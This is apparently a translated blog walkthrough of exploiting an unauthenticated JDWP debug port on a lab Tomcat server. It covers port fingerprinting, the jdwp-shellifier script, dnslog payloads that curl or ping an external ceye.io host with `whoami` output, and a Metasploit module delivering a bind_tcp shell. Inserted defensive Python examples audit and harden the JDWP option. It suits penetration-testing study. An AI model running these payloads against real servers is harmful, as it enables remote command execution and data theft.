JDWP unauthorized access: quick exploitation
2022-07-28 17:34:00 【itest_2016】
JDWP: a brief introduction
First, the two terms debugger and target VM. The target VM is the Java virtual machine running the program we want to debug. It is no different from an ordinary JVM except that it loaded the JDWP agent at startup, which is what gives it debugging capability. The debugger sends commands to the target VM to read its runtime state and to control execution of the Java program. Debugger and target VM run in separate processes, and the protocol they use to communicate is JDWP.
The JDWP handshake
A JDWP session has roughly two stages: the handshake, then command/reply traffic. The handshake is the first thing that happens after the transport-layer connection is established: the debugger sends the 14-byte string "JDWP-Handshake" to the target Java virtual machine, and the target JVM replies with the same string, "JDWP-Handshake".

The JDWP agent's role in debugging

Setting up the lab environment
Attacker machine: Kali, IP 192.168.204.128
Target machine: CentOS 7, IP 192.168.204.133
Download the Tomcat package with wget: wget http://mirror.bit.edu.cn/apache/tomcat/tomcat-8/v8.5.43/bin/apache-tomcat-8.5.43.tar.gz
Unpack it: tar zxvf apache-tomcat-8.5.43.tar.gz
Move it to the directory it will run from: sudo mv apache-tomcat-8.5.43 /usr/local/tomcat8
Enter the bin directory: cd bin
Open catalina.sh and add the following as the first line of the file: declare -x CATALINA_OPTS="-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000"
Start Tomcat with ./startup.sh
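As an added example (not part of the original post): the CATALINA_OPTS line above starts a JDWP agent on TCP port 8000 with no authentication, and because the address carries no host, on JDK 8 and earlier it binds every interface, which is what makes the target reachable from the attacker machine in this lab. The script below parses such an option string, reports where the listener is bound, and rewrites it to loopback only. The function names are this example's own; the JDK 9 behaviour noted in the comments (a bare port binds loopback, *:port binds all interfaces) is the JDK's default from that version on.

```python
"""Audit the JDWP agent settings in a JVM option string and produce a
loopback-only variant. Added example, not from the original post; the
POST_CATALINA_OPTS value is the line the post adds to catalina.sh."""
import re

# The line the post adds to catalina.sh. -Xdebug/-Xnoagent/java.compiler=NONE
# are legacy flags; the debug agent itself is configured by -Xrunjdwp (old
# spelling) or -agentlib:jdwp (current spelling).
POST_CATALINA_OPTS = ("-server -Xdebug -Xnoagent -Djava.compiler=NONE "
                      "-Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000")

JDWP_AGENT_RE = re.compile(r"-(?:Xrunjdwp:|agentlib:jdwp=)(\S+)")


def parse_jdwp_agent(opts):
    """Return the agent's sub-options as a dict, or None if no agent is set."""
    m = JDWP_AGENT_RE.search(opts)
    if not m:
        return None
    agent = {}
    for part in m.group(1).split(","):
        key, _, value = part.partition("=")
        agent[key] = value
    return agent


def listener_exposure(address, jdk_major):
    """Where a server=y dt_socket agent listens for the given address.
    JDK 8 and earlier: a bare port ("8000") listens on all interfaces.
    JDK 9 and later:   a bare port listens on loopback; "*:8000" means all."""
    host, sep, _port = address.rpartition(":")
    if not sep:                                   # bare port, no host part
        return "all-interfaces" if jdk_major <= 8 else "loopback"
    if host in ("*", "0.0.0.0", "::", "[::]"):
        return "all-interfaces"
    if host in ("127.0.0.1", "localhost", "::1", "[::1]"):
        return "loopback"
    return "specific-host"


def audit_jdwp_options(opts, jdk_major):
    """Summarise the risk of the JDWP agent configured in opts (if any)."""
    agent = parse_jdwp_agent(opts)
    if agent is None:
        return {"agent": False, "exposure": None,
                "finding": "no JDWP agent configured"}
    if agent.get("transport") != "dt_socket":
        return {"agent": True, "exposure": None,
                "finding": "non-socket transport: %s" % agent.get("transport")}
    if agent.get("server", "n") != "y":
        # Client mode: the JVM dials out to a debugger, it opens no listener.
        return {"agent": True, "exposure": None,
                "finding": "client mode, JVM connects out to %s" % agent.get("address")}
    exposure = listener_exposure(agent.get("address", ""), jdk_major)
    if exposure == "all-interfaces":
        finding = "JDWP listener reachable from the network with no authentication"
    elif exposure == "loopback":
        finding = "JDWP listener limited to loopback"
    else:
        finding = "JDWP listener bound to a specific host address"
    return {"agent": True, "exposure": exposure, "finding": finding}


def bind_to_loopback(opts):
    """Rewrite a bare or wildcard address so the agent listens on loopback
    only; a remote debugger then reaches it through an SSH port forward
    instead of the open network. Already-scoped addresses are left alone."""
    return re.sub(r"(address=)(?:\*:|0\.0\.0\.0:)?(\d+)(?=,|\s|$)",
                  r"\g<1>127.0.0.1:\2", opts)


if __name__ == "__main__":
    for jdk in (8, 11):
        print("JDK %d:" % jdk, audit_jdwp_options(POST_CATALINA_OPTS, jdk))
    print("hardened:", bind_to_loopback(POST_CATALINA_OPTS))
```

Run it with the JDK major version the server actually uses; the same option string is a network-wide listener on JDK 8 and a loopback-only one on JDK 11, so the version matters for the verdict.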


JDWP service fingerprinting
We first scan with nmap and see what it finds.

Nmap does not report detailed service information for the port, so we scan again.


We then run telnet ip port and, as soon as the connection is up, send JDWP-Handshake as a simple check for unauthorized access: if the server replies with JDWP-Handshake as well, nine times out of ten the vulnerability is present.
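The handshake described in the introduction and the telnet check just above, as an added example that is not code from the original post: both sides of the 14-byte exchange are simulated over an in-process socket pair (no network is touched), and a small classifier shows how a monitoring pipeline could recognise a JDWP session being opened from the first bytes each side sends on a TCP flow. All function names are this example's own.

```python
"""JDWP handshake, both sides, simulated in-process; plus a payload classifier
for flow monitoring. Added example, not from the original post."""
import socket
import threading

HANDSHAKE = b"JDWP-Handshake"      # 14 ASCII bytes, identical in both directions
HANDSHAKE_LEN = len(HANDSHAKE)     # 14


def recv_exact(sock, n):
    """Read exactly n bytes, or fewer if the peer closes first."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf


def target_vm_side(sock):
    """What the JDWP agent (server=y) does on a new connection: read 14 bytes
    and, if they are the magic string, echo it back and treat the session as
    open. Nothing here identifies or authenticates the peer, which is why a
    listener reachable from the network is a problem."""
    try:
        greeting = recv_exact(sock, HANDSHAKE_LEN)
    except socket.timeout:
        greeting = b""
    if greeting != HANDSHAKE:
        sock.close()
        return False
    sock.sendall(HANDSHAKE)
    return True


def debugger_side(sock, greeting=HANDSHAKE):
    """What a debugger does: send the string, expect the identical reply."""
    sock.sendall(greeting)
    try:
        reply = recv_exact(sock, HANDSHAKE_LEN)
    except socket.timeout:
        reply = b""
    return reply == HANDSHAKE


def simulate_handshake(client_greeting=HANDSHAKE):
    """Run both sides over a socketpair; return (debugger_ok, vm_ok).
    client_greeting should be 14 bytes so the agent side gets a full read."""
    dbg_sock, vm_sock = socket.socketpair()
    for s in (dbg_sock, vm_sock):
        s.settimeout(2)
    outcome = {}
    t = threading.Thread(target=lambda: outcome.update(vm=target_vm_side(vm_sock)))
    t.start()
    dbg_ok = debugger_side(dbg_sock, client_greeting)
    t.join()
    dbg_sock.close()
    vm_sock.close()
    return dbg_ok, outcome.get("vm", False)


def classify_tcp_payloads(client_bytes, server_bytes):
    """For a monitoring pipeline: given the first bytes each side sent on a
    TCP flow, report whether a JDWP session was opened. A probe that got no
    reply is still worth logging; a completed handshake on a port that is
    not supposed to be reachable is the finding."""
    client_hs = client_bytes.startswith(HANDSHAKE)
    server_hs = server_bytes.startswith(HANDSHAKE)
    if client_hs and server_hs:
        return "jdwp-session-established"
    if client_hs:
        return "jdwp-probe-no-reply"
    return "not-jdwp"


if __name__ == "__main__":
    print("correct handshake bytes:", simulate_handshake())
    print("wrong 14-byte greeting: ", simulate_handshake(b"HTTP-Handshake"))
```

The agent side closes the connection on any other 14 bytes, so the debugger's read returns empty and the session is refused; with the right bytes the session is open and the agent will then accept commands from whoever connected.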

Exploitation methods
Use the jdwp-shellifier script for command execution
Use Metasploit
Use the IntelliJ IDEA editor (this takes a lot of space; I will cover it next time)
Now let's show how to use the jdwp-shellifier script against the JDWP unauthorized-access vulnerability to execute commands. First download the script from https://github.com/IOActive/jdwp-shellifier.
Reading the author's README.md tells you the command format for the script.

We point it at our target IP and try it.


We use dnslog to test. Tool website: http://ceye.io/records/dns


As you can see, no directory listing was returned, so we test instead with the payloads that ceye.io provides.
Common Linux payloads:
curl http://ip.port.b182oj.ceye.io/`whoami`
ping `whoami`.ip.port.b182oj.ceye.io
Common Windows payload:
ping %USERNAME%.b182oj.ceye.io


Now let's exploit the JDWP vulnerability with Metasploit.
Start Metasploit with msfconsole and select the exploit/multi/misc/java_jdwp_debugger module.

Use info to view the current exploit's details.


Set the target IP and the port of the vulnerable service.

Key point:
When we do security or penetration testing, much of the work is on the client's (Party A's) premises, where the network environment is very complex. When the author's laptop is connected to the company network, neither the network access controls nor the endpoint security software will let me open an nc listening port. The Kali system we normally test from usually has no intranet IP either, so for a reverse connection the only option would be a Metasploit listener on the public Internet, and some network-isolated environments cannot reach the public Internet at all. In that situation we have to choose a forward-connecting (bind) backdoor. Let me draw a picture to illustrate the idea.
Common backdoor (Trojan) types

Msfvenom can easily generate the common Meterpreter reverse-connecting and forward-connecting (bind) backdoors:
reverse_tcp
reverse_http
reverse_https
bind_tcp
These types are the ones most often seen in daily work; only bind_tcp is a forward (bind) connection.
In the current exploit, use show payloads to see which payloads, i.e. which backdoors, the exploit supports.

We set the exploit to use the linux/x64/shell/bind_tcp payload.

Now all configuration is done; simply enter run to execute. Let's look at the execution process.


In this article we have briefly introduced the JDWP vulnerability and walked through two ways of exploiting it. The advantage of the jdwp-shellifier.py script is that it is easy to deploy and use; the disadvantage is that command output is not echoed back. Metasploit's JDWP module is simple and fast and can execute system commands, but the Kali system is a bit bloated for some environments. In practice, pick whichever fits the scenario. That's all for today; soon I will write an article on using the IntelliJ IDEA editor against the JDWP vulnerability, describing the principle and the exploitation process in detail.